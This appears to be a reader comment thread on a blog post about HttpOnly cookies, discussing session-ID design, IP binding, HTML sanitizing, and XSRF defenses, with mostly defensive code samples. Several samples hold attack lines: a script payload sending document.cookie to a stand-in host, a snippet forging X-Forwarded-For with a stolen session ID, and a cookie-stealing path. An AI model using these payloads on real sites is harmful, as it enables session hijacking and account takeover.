Protecting Your Cookies: HttpOnly

um… I think this is a tad off…

First of all, any web developer worth their salt knows enough not to trust the session ID alone to identify a user… and if not, they need a swift 2x4 to the head.

Yes, you store the session ID in the cookie. On the server, you store the session ID, the username, the IP address of the user, the time of the login, and so on. And you rotate this session ID every 15 minutes (or so) so that old ones become invalid… and if you see the same session ID used from 2 different IP addresses, you sound the goddamn alarm.

HttpOnly is a nice extra layer of protection for the session cookie… but the real problem here is that the session ID was not cryptographically strong in the first place.
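Here's a minimal sketch of that kind of server-side session record in Python; the in-memory store, the field names, and the 15-minute rotation window are my own illustrative assumptions, not anyone's actual implementation:

```python
import secrets
import time

SESSIONS = {}              # hypothetical in-memory store: session_id -> record
ROTATE_AFTER = 15 * 60     # rotate the ID roughly every 15 minutes

def create_session(username, client_ip):
    sid = secrets.token_urlsafe(32)          # cryptographically strong, unguessable ID
    SESSIONS[sid] = {"user": username, "ip": client_ip,
                     "login": time.time(), "issued": time.time()}
    return sid                               # this is what goes into the cookie

def validate_session(sid, client_ip):
    record = SESSIONS.pop(sid, None)
    if record is None:
        return None                          # unknown or rotated-out ID
    if record["ip"] != client_ip:
        raise RuntimeError("same session ID seen from two IPs: sound the alarm")
    if time.time() - record["issued"] > ROTATE_AFTER:
        record["issued"] = time.time()
        sid = secrets.token_urlsafe(32)      # old ID becomes invalid
    SESSIONS[sid] = record
    return sid                               # caller re-sets the cookie if the ID changed
```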

Robert C. Barth said: Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?

I’m surprised this isn’t a standard practice… is there some gotcha to this that I haven’t thought of? I’m not a web developer myself, so there could be a simple “yeah, but…” to this solution.

Sometimes it’s better to buy hardware to solve that problem. There are firewall products that record which cookies go out versus which come back, refuse cookies added from the client side, and help prevent replay attacks, injection attacks, and so on. If you write software in layers, you should also think about layering access to your website.

There’s also the benefit of reducing the load on your servers to legitimate requests.

Yeah… special thanks, but let’s not forget he’s the same modesty that was so annoying that day… maybe he could have contacted you without screwing up the site first

IP address doesn’t help much either. The XSS payload can grab the victim’s IP address and send it to the attacker along with the cookie. And it’s not too hard to spoof an IP address in an HTTP request if you just want to send a command…
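To make that concrete under one common setup (my own illustration, not anything from the post): if the application derives the client IP from a header like X-Forwarded-For rather than from the socket, “spoofing” it is just a header away:

```python
import requests

# If the server trusts X-Forwarded-For without a controlled proxy in front of it,
# any client can claim to be any address. URL, cookie, and form fields are made up.
requests.post(
    "https://forum.example/post",
    headers={"X-Forwarded-For": "203.0.113.7"},   # the address we want the server to record
    cookies={"session_id": "stolen-session-id"},
    data={"body": "attacker-controlled content"},
)
```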

It is really hard to escape HTML yourself. There are SO MANY ways to make an XSS attack string: http://ha.ckers.org/xss.html

Now if only your friend would listen to the “whitelist, don’t blacklist” suggestion, he could, with some consideration, avoid all XSS attacks.

Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?

People can still farm IP addresses and spoof them if you allow them to post external links: I post a link to a page, you click on it, the page saves the IP of your request and redirects you to a rickroll. I then steal your session ID using the technique described above. Now what?

whitelist, don’t blacklist suggestion

We do whitelist; our whitelist wasn’t good enough. Think of the bouncer at a club door. If you’re not on the list, you don’t get in.
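Here is a bare-bones Python sketch of the bouncer-at-the-door idea, using only the standard library; the allowed-tag list is an arbitrary example, and a real application should use a well-vetted sanitizer rather than anything this small:

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "em", "strong", "code", "pre", "p"}   # the guest list

class AllowlistSanitizer(HTMLParser):
    """Re-emit only allowlisted tags (stripped of attributes); escape everything else."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        # Dropping attributes kills onclick=, style=, javascript: URLs, etc.
        self.out.append(f"<{tag}>" if tag in ALLOWED_TAGS
                        else escape(self.get_starttag_text()))

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>" if tag in ALLOWED_TAGS else escape(f"</{tag}>"))

    def handle_data(self, data):
        self.out.append(escape(data))        # plain text is always escaped

def sanitize(html_text):
    parser = AllowlistSanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out)

print(sanitize('<b>hi</b><script>alert(document.cookie)</script>'))
# -> <b>hi</b>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
```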

So has that convinced your ‘friend’ to not use a home baked HTML sanitizer?

No, we just improved it. That’s how code evolves. Giving up is lame.

Let me tell you a story.

The host name is made up, but everything else is true.

  • PunBB stores the user name and the hashed password in the cookie. (It uses a different hash than the one in the DB.)

  • acmeshell.inc users can have their homepages, with PHP.

Once upon a time, there was a forum at http://acmeshell.inc/forum/. (It has been moved to another server since then.) The forum used PunBB, and even though it was in /forum/, it would set cookies with a path of /.

Cookie path was /.

User homepages were at /~user/.

Guess what happened.

/~joe/stealcookies.php?.jpg

No JavaScript was used.
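A small illustration of the setting that mattered here, using Python's http.cookies; the cookie name and value are made up:

```python
from http import cookies

leaky = cookies.SimpleCookie()
leaky["punbb_auth"] = "user-and-password-hash"
leaky["punbb_auth"]["path"] = "/"          # browsers will send this to /~joe/... too

scoped = cookies.SimpleCookie()
scoped["punbb_auth"] = "user-and-password-hash"
scoped["punbb_auth"]["path"] = "/forum/"   # only sent back for URLs under /forum/

print(leaky.output())    # Set-Cookie: punbb_auth=user-and-password-hash; Path=/
print(scoped.output())   # Set-Cookie: punbb_auth=user-and-password-hash; Path=/forum/
```

With the path scoped to /forum/, a PHP script in someone's home directory never even receives the cookie.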

Most of the time, when you accept input from the user, the very first thing you do is pass it through an HTML encoder.

Really? Why not do your XSS encoding logic on the output instead? As far as input is concerned, I want to record what my users typed, exactly as they typed it, as a general principle. It helps in figuring out what happened, and prevents iffy data migrations if I change the encoding logic later. How I deliver output is a different matter, of course :wink:
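A tiny Python sketch of that encode-on-output approach, with a made-up comment string:

```python
from html import escape

# Store exactly what the user typed...
comment = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"
saved_to_db = comment                       # no encoding on the way in

# ...and encode only at the moment it is rendered into an HTML context.
rendered = "<p>" + escape(saved_to_db) + "</p>"
print(rendered)                             # the <script> comes out as inert &lt;script&gt;... text
```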

I never liked the idea of HttpOnly for cookies as it prevents my favorite way of stopping another increasingly common class of attacks known as XSRF.

When HttpOnly is NOT enabled, a developer like myself can post the cookie as POST data in an AJAX request (or whatever) in order to show the server that the request came from the appropriate domain. This is usually called a double-submitted cookie, and it’s what allows applications like Gmail to ensure that the visitor making the request really intends to make it (as opposed to some evil site trying to grab a user’s address book by including a script tag that references the script dynamically generated on Google’s server for that user). Another example of an actual XSRF that could have been prevented by doubly-submitted cookies without HttpOnly can be found here: http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/. (See the sketch after this comment.)

Anyway, like Chris Dary said above: “This trick, while definitely useful, is treating the symptom and not the disease.”
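Here is a minimal Flask sketch of the double-submit pattern described above; the route names, cookie name, and token handling are illustrative assumptions, not Gmail's actual mechanism:

```python
import secrets
from flask import Flask, abort, make_response, request

app = Flask(__name__)

@app.route("/")
def index():
    resp = make_response("page whose own JavaScript reads the 'csrf' cookie and echoes it back")
    # Deliberately NOT HttpOnly: the site's own scripts must be able to read it.
    resp.set_cookie("csrf", secrets.token_urlsafe(32), secure=True, httponly=False)
    return resp

@app.route("/update", methods=["POST"])
def update():
    token = request.cookies.get("csrf")
    # A cross-site page can make the browser *send* the cookie, but it cannot *read*
    # it, so it cannot reproduce the value in the request body.
    if not token or request.form.get("csrf") != token:
        abort(403)
    return "ok"
```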

For people associating cookies with the client IP: remember that people want to use persistent cookies, and that people have laptops, which get different IPs depending on where they are. Also, some users are behind load-balancing proxies, which may make a single user appear to your site under several different client IPs.

What should users do to protect themselves?

My knowledge of web design = 0
With that in mind, why the hell is that not the default for every single browser? Why would other people (websites) have anything to do with cookies from my website?

If there is a reason at all, why not make HttpOnly the default and create a little thing called NoHttpOnly?
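For what it's worth, today it's the site that has to opt in, cookie by cookie. For example, with Python's standard library (cookie name and value are illustrative):

```python
from http import cookies

c = cookies.SimpleCookie()
c["session_id"] = "abc123"
c["session_id"]["httponly"] = True   # opt in: page scripts can no longer read this via document.cookie
c["session_id"]["secure"] = True     # only sent over HTTPS
print(c.output())                    # Set-Cookie: session_id=abc123; HttpOnly; Secure
```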

The following is a must-read for all webappers:

http://directwebremoting.org/blog/joe/2007/10/29/web_application_security.html

MAS: inherently, if you trust a site to run JavaScript on your machine for advanced features, you’re trusting it to stay in control of its content. Filters are being added to newer browsers, but I don’t expect these intelligent blacklists to be very effective.

For sites you don’t trust, the Firefox NoScript extension is solid web security: it disables rich content unless you explicitly enable it for a domain. You still have to decide whether to trust sites like Stack Overflow, but a lot of sites are still useful without JavaScript. (I haven’t enabled Coding Horror, for example.)

XSS filters: http://blogs.technet.com/swi/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
NoScript: https://addons.mozilla.org/en-US/firefox/addon/722

Giving up is lame? Well, I don’t want to be lame! So there’s no way I’ll give up on my reimplementation of the OS, compiler, web browser, and I won’t even consider giving up on the rewrite of everything I’ve ever done!

Also, “giving up is lame” is the worst excuse I’ve ever heard for not-invented-here syndrome. No one said software is a crime against humanity - but it’s actually not always necessary or appropriate to write everything from scratch.

Most of the time, when you accept input from the user, the very first thing you do is pass it through an HTML encoder.

I don’t know if you worded this poorly or if this is actually what you’re doing, but that’s not the first thing you do when you accept input. It’s the last thing you do before you output said input to an HTML page.

If you wrote this blog software that way, then that’s probably why Andy’s link is garbled up above.

Following on from my last comment:

If you wrote this blog software that way, then that’s probably why Andy’s link is garbled up above.